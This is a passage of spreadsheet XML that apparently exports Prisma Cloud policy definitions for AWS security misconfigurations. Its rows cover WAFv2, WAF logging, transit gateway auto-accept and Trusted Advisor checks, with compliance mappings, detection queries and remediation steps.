          <t>true</t>
        </is>
      </c>
      <c r="AK2138" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" t="inlineStr"/>
      <c r="B2139" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2139" s="2" t="inlineStr"/>
      <c r="D2139" t="inlineStr"/>
      <c r="E2139" t="inlineStr"/>
      <c r="F2139" t="inlineStr"/>
      <c r="G2139" t="b">
        <v>0</v>
      </c>
      <c r="H21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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2139" t="inlineStr">
        <is>
          <t>aws-trusted</t>
        </is>
      </c>
      <c r="K2139" t="inlineStr">
        <is>
          <t>AWS Trusted Advisor Block Public Access Enabled</t>
        </is>
      </c>
      <c r="L2139" t="inlineStr"/>
      <c r="M2139" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2139" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2139" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2139" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2139" t="inlineStr"/>
      <c r="R2139" t="inlineStr"/>
      <c r="S2139" t="inlineStr"/>
      <c r="T2139" t="b">
        <v>0</v>
      </c>
      <c r="U2139" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2139" t="inlineStr">
        <is>
          <t>aws-trusted-advisor-check-result</t>
        </is>
      </c>
      <c r="W2139" t="inlineStr"/>
      <c r="X2139" t="inlineStr"/>
      <c r="Y2139" t="inlineStr"/>
      <c r="Z2139" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-trusted-advisor-check-result' AND json.rule = result.flaggedResources[*].metadata contains "Public"</t>
        </is>
      </c>
      <c r="AA2139" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2139" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2139" t="inlineStr"/>
      <c r="AD2139" t="b">
        <v>0</v>
      </c>
      <c r="AE2139" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2139" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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39" t="inlineStr">
        <is>
          <t>b4b8f89d-62b7-4264-82b4-fc2416cb569c</t>
        </is>
      </c>
      <c r="AI2139" t="inlineStr">
        <is>
          <t>fdee80ca-7f22-4a74-8033-998e882dee2c</t>
        </is>
      </c>
      <c r="AJ2139" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2139" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, ITSG-33, HIPAA, GDPR, SOC 2, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2140" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2140" s="2" t="inlineStr"/>
      <c r="D2140" t="inlineStr"/>
      <c r="E2140" t="inlineStr"/>
      <c r="F2140" t="inlineStr"/>
      <c r="G2140" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2140" t="inlineStr">
        <is>
          <t>aws-vpc</t>
        </is>
      </c>
      <c r="K2140" t="inlineStr">
        <is>
          <t>AWS Transit Gateway auto accept vpc attachment is enabled</t>
        </is>
      </c>
      <c r="L2140" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2140" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2140" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2140" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2140" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2140" t="inlineStr">
        <is>
          <t>164.308(a)</t>
        </is>
      </c>
      <c r="R2140" t="inlineStr">
        <is>
          <t>164.308(a)(4)(ii)(B)</t>
        </is>
      </c>
      <c r="S2140" t="inlineStr"/>
      <c r="T2140" t="b">
        <v>0</v>
      </c>
      <c r="U2140" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2140" t="inlineStr">
        <is>
          <t>aws-vpc-transit-gateway</t>
        </is>
      </c>
      <c r="W2140" t="inlineStr">
        <is>
          <t>This policy identifies if Transit Gateways are automatically accepting shared VPC attachments. When this feature is enabled, the Transit Gateway automatically accepts any VPC attachment requests from other AWS accounts without requiring explicit authorization or verification. This can be a security risk, as it may allow unauthorized VPC attachments to connect to the Transit Gateway. As per the best practices for authorization and authentication, it is recommended to turn off the AutoAcceptSharedAttachments feature.</t>
        </is>
      </c>
      <c r="X2140" t="inlineStr">
        <is>
          <t>To modify a transit gateway Auto accept shared attachments:
   1. Open the Amazon VPC console at https://console.aws.amazon.com/vpc/.
   2. On the navigation pane, choose Transit Gateways.
   3. Choose the transit gateway to modify.
   4. Under the ‘Actions' dropdown, choose the ‘Modify transit gateway’ option.
   5. On the 'Modify transit gateway' page, uncheck the 'Auto accept shared attachments' checkbox under the 'Configure cross-account sharing options' section.
   6. Click 'Modify transit gateway' to update the changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-331
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-331</t>
        </is>
      </c>
      <c r="Y2140" t="inlineStr"/>
      <c r="Z2140" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-vpc-transit-gateway' AND json.rule = isShared is false and options.autoAcceptSharedAttachments exists and options.autoAcceptSharedAttachments equal ignore case "enable"
{"category":"General","resourceTypes":["aws_ec2_transit_gateway"]}</t>
        </is>
      </c>
      <c r="AA2140" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2140" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2140" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-1056-CKV_AWS_331</t>
        </is>
      </c>
      <c r="AD2140" t="b">
        <v>1</v>
      </c>
      <c r="AE2140" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2140" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>c4f6f70c-3ed7-4c64-aab9-12349674fd36</t>
        </is>
      </c>
      <c r="AI2140" t="inlineStr">
        <is>
          <t>9ea06c8e-f1a9-47e9-9519-2a4604bdeb98</t>
        </is>
      </c>
      <c r="AJ2140" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2140" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" t="inlineStr">
        <is>
          <t>CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, PCI DSS v4.0, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27002:2022, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2141" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2141" s="2" t="inlineStr"/>
      <c r="D2141" t="inlineStr"/>
      <c r="E2141" t="inlineStr"/>
      <c r="F2141" t="inlineStr"/>
      <c r="G2141" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2141" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K2141" t="inlineStr">
        <is>
          <t>AWS CloudFront not configured with AWS Web Application Firewall v2 (AWS WAFv2)</t>
        </is>
      </c>
      <c r="L2141" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2141" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2141" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2141" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2141" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2141" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2141" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2141" t="inlineStr"/>
      <c r="T2141" t="b">
        <v>0</v>
      </c>
      <c r="U2141" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2141" t="inlineStr">
        <is>
          <t>aws-waf-classic-global-web-acl-resource</t>
        </is>
      </c>
      <c r="W2141" t="inlineStr">
        <is>
          <t>This policy identifies AWS CloudFront which is not configured with AWS Web Application Firewall v2 (AWS WAFv2). As a best practice, configure the AWS WAFv2 service on the CloudFront to protect against application-layer attacks. To block malicious requests to your CloudFront, define the block criteria in the WAFv2 web access control list (web ACL).</t>
        </is>
      </c>
      <c r="X2141" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Go to the CloudFront Distributions Dashboard
3. Click on the reported web distribution
4. On 'General' tab, Click on 'Edit' button under 'Settings'
5. On 'Edit Distribution' page, from 'AWS WAF Web ACL' dropdown select WAFv2 ACL which you want to apply
Note: In case no WAFv2 ACL found from 'AWS WAF Web ACL' dropdown list, Please follow below URL to create WAFv2 ACL:
https://docs.aws.amazon.com/waf/latest/developerguide/web-acl-creating.html
6. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2141" t="inlineStr"/>
      <c r="Z2141" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-waf-classic-global-web-acl-resource' as X; config from cloud.resource where api.name = 'aws-cloudfront-list-distributions' AND json.rule = webACLId is not empty as Y; filter '$.X.webACL.webACLId equals $.Y.webACLId'; show Y;</t>
        </is>
      </c>
      <c r="AA2141" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2141" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2141" t="inlineStr">
        <is>
          <t>PC-AWS-CFR-825</t>
        </is>
      </c>
      <c r="AD2141" t="b">
        <v>1</v>
      </c>
      <c r="AE2141" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2141" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>93a44fd2-7a87-4a2f-8f9f-8774a865c243</t>
        </is>
      </c>
      <c r="AI2141" t="inlineStr">
        <is>
          <t>656ae854-bd16-4f3b-9849-a2582403fdab</t>
        </is>
      </c>
      <c r="AJ2141" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2141" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), CIS Controls v8, CHC HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), CIS Controls v8.1, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), CIS Controls v7.1</t>
        </is>
      </c>
      <c r="B2142" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2142" s="2" t="inlineStr"/>
      <c r="D2142" t="inlineStr"/>
      <c r="E2142" t="inlineStr"/>
      <c r="F2142" t="inlineStr"/>
      <c r="G2142" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2142" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K2142" t="inlineStr">
        <is>
          <t>AWS WAF Classic (Regional) in use</t>
        </is>
      </c>
      <c r="L2142" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2142" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2142" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2142" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2142" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2142" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2142" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2142" t="inlineStr"/>
      <c r="T2142" t="b">
        <v>0</v>
      </c>
      <c r="U2142" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2142" t="inlineStr">
        <is>
          <t>aws-waf-classic-web-acl-resource</t>
        </is>
      </c>
      <c r="W2142" t="inlineStr">
        <is>
          <t>This policy identifies AWS Classic WAF which is in use. As a best practice, create the AWS WAFv2 and configure accordingly to protect against application-layer attacks. The block criteria in the WAFv2 web access control list (web ACL) has more capabilities than the Classic WAF to filter-out malicious traffic.</t>
        </is>
      </c>
      <c r="X2142" t="inlineStr">
        <is>
          <t>To migrate a web ACL from AWS WAF Classic to AWS WAF, follow below URL:
https://docs.aws.amazon.com/waf/latest/developerguide/waf-migrating-procedure.html</t>
        </is>
      </c>
      <c r="Y2142" t="inlineStr"/>
      <c r="Z2142" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-waf-classic-web-acl-resource' AND json.rule = resources.apiGateway[*] exists or resources.applicationLoadBalancer[*] exists</t>
        </is>
      </c>
      <c r="AA2142" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2142" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2142" t="inlineStr">
        <is>
          <t>PC-AWS-WAF-826</t>
        </is>
      </c>
      <c r="AD2142" t="b">
        <v>1</v>
      </c>
      <c r="AE2142" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2142" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>a1ef6b83-de93-4d84-8573-57c5da61eab7</t>
        </is>
      </c>
      <c r="AI2142" t="inlineStr">
        <is>
          <t>13bbdc80-1339-4e8b-9e4b-4c206bec307c</t>
        </is>
      </c>
      <c r="AJ2142" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2142" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2143" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2143" s="2" t="inlineStr"/>
      <c r="D2143" t="inlineStr"/>
      <c r="E2143" t="inlineStr"/>
      <c r="F2143" t="inlineStr"/>
      <c r="G2143" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2143" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K2143" t="inlineStr">
        <is>
          <t>AWS WAF Rule Group CloudWatch metrics disabled</t>
        </is>
      </c>
      <c r="L2143" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2143" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2143" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2143" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2143" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2143" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2143" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2143" t="inlineStr"/>
      <c r="T2143" t="b">
        <v>0</v>
      </c>
      <c r="U2143" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2143" t="inlineStr">
        <is>
          <t>aws-waf-v2-rule-group</t>
        </is>
      </c>
      <c r="W2143" t="inlineStr">
        <is>
          <t>This policy identifies the AWS WAF Rule Group having CloudWatch metrics disabled.
AWS WAF rule groups have CloudWatch metrics that provide information about the number of allowed and blocked web requests, counted requests, and requests that pass through without matching any rule in the rule group. These metrics can be used to monitor and analyse the performance of the web access control list (web ACL) and its associated rules.
It is recommended to enable CloudWatch metrics for a WAF rule group to help in monitoring and analysis of web requests.</t>
        </is>
      </c>
      <c r="X2143" t="inlineStr">
        <is>
          <t>To enable RuleGroup with CloudWatch metrics please follow below steps:
1. Run the below command to get the ruleGroup details to be used for update
    aws wafv2 list-rule-groups --scope {scopeOfRuleGroup}
2. Get the ruleGroup 'Id' and 'LockToken' values for the ruleGroup to be updated from the output.
3. Run the below command with name and 'Id' obtained from above output
     aws wafv2 get-rule-group --name {ruleGroupName} --scope {scopeOfRuleGroup} --id {IdFromAboveOutput}
4. Get the 'Rules' block output and save it in a file for further reference from above command output
5. Please update 'CloudWatchMetricsEnabled' field to true for every rule in the file saved from above along with providing a metric name at the 'MetricName' field
6. Run the below command to enable CloudWatch metrics on the ruleGroup.
      aws wafv2 update-rule-group \n       --name {ruleGroupName} \n       --scope {scopeOfRuleGroup} \n       --id {ruleGroupId} \n       --lock-token {tokenFromAboveOutput} \n       --rules file://{fileFromAboveOutput}
       --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName= 
          {metricNameForRuleGroup)</t>
        </is>
      </c>
      <c r="Y2143" t="inlineStr"/>
      <c r="Z2143" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-waf-v2-rule-group' AND json.rule = VisibilityConfig.CloudWatchMetricsEnabled is false or Rules[?any( VisibilityConfig.CloudWatchMetricsEnabled is false)] exists</t>
        </is>
      </c>
      <c r="AA2143" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2143" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2143" t="inlineStr">
        <is>
          <t>PC-AWS-WAF-1173</t>
        </is>
      </c>
      <c r="AD2143" t="b">
        <v>1</v>
      </c>
      <c r="AE2143" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2143" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>32b4e392-6a64-4977-93f8-7e553603da20</t>
        </is>
      </c>
      <c r="AI2143" t="inlineStr">
        <is>
          <t>e73c95e7-7d5e-4dc4-a300-eed8ee67f17f</t>
        </is>
      </c>
      <c r="AJ2143" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2143" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), MLPS 2.0 (Level 2), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, Korea – Information Security Management System (ISMS), HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v4.0.12, DORA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2144" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2144" s="2" t="inlineStr"/>
      <c r="D2144" t="inlineStr"/>
      <c r="E2144" t="inlineStr"/>
      <c r="F2144" t="inlineStr"/>
      <c r="G2144" t="b">
        <v>0</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2144" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K2144" t="inlineStr">
        <is>
          <t>AWS Web Application Firewall v2 (AWS WAFv2) logging is disabled</t>
        </is>
      </c>
      <c r="L2144" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2144" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2144" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2144" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2144" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2144" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2144" t="inlineStr">
        <is>
          <t>6.2</t>
        </is>
      </c>
      <c r="S2144" t="inlineStr"/>
      <c r="T2144" t="b">
        <v>0</v>
      </c>
      <c r="U2144" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2144" t="inlineStr">
        <is>
          <t>aws-waf-v2-web-acl-resource</t>
        </is>
      </c>
      <c r="W2144" t="inlineStr">
        <is>
          <t>This policy identifies Web Application Firewall v2s (AWS WAFv2) for which logging is disabled. Enabling WAFv2 logging, logs all web requests inspected by the service which can be used for debugging and additional forensics. The logs will help to understand why certain rules are triggered and why certain web requests are blocked. You can also integrate the logs with any SIEM and log analysis tools for further analysis. It is recommended to enable logging on your Web Application Firewall v2s (WAFv2).
For details:
https://docs.aws.amazon.com/waf/latest/developerguide/logging.html#logging-management
NOTE: Global (CloudFront) WAFv2 resources are out of scope for this policy.</t>
        </is>
      </c>
      <c r="X2144" t="inlineStr">
        <is>
          <t>To enable logging on your reported WAFv2s, follow below mentioned URL:
https://docs.aws.amazon.com/waf/latest/developerguide/logging.html#logging-management
NOTE: No additional cost to enable logging on AWS WAFv2 (minus Kinesis Firehose and any storage cost).
For Kinesis Firehose or any storage additional charges refer https://aws.amazon.com/cloudwatch/pricing/</t>
        </is>
      </c>
      <c r="Y2144" t="inlineStr"/>
      <c r="Z2144" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-waf-v2-web-acl-resource' AND json.rule = '(resources.applicationLoadBalancer[*] exists or resources.apiGateway[*] exists or resources.other[*] exists) and loggingConfiguration.resourceArn does not exist'</t>
        </is>
      </c>
      <c r="AA2144" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2144" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2144" t="inlineStr">
        <is>
          <t>PC-AWS-WAF-749</t>
        </is>
      </c>
      <c r="AD2144" t="b">
        <v>1</v>
      </c>
      <c r="AE2144" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2144" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>c291b605-9279-4d7a-b14e-3d69cc13dd35</t>
        </is>
      </c>
      <c r="AI2144" t="inlineStr">
        <is>
          <t>ab0317ac-661a-4a7d-a28a-53f4fdf6d290</t>
        </is>
      </c>
      <c r="AJ2144" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2144" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" t="inlineStr">
        <is>
          <t>CIS Controls v8, kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, Korea – Information Security Management System (ISMS), ISO/IEC 27001:2022, ISO/IEC 27001:2022, PCI DSS v4.0, MAS TRM 2021, MAS TRM 2021, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27002:2022, NIST 800-53 Rev 5, NYDFS 23 CRR-NY 500.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2145" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2145" s="2" t="inlineStr"/>
      <c r="D2145" t="inlineStr"/>
      <c r="E2145" t="inlineStr"/>
      <c r="F2145" t="inlineStr"/>
      <c r="G2145" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2145" t="inlineStr">
        <is>
          <t>aws-waf</t>
        </is>
      </c>
      <c r="K2145" t="inlineStr">
        <is>
          <t>AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2)</t>
        </is>
      </c>
      <c r="L2145" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2145" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2145" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2145" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2145" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2145" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2145" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2145" t="inlineStr">
        <is>
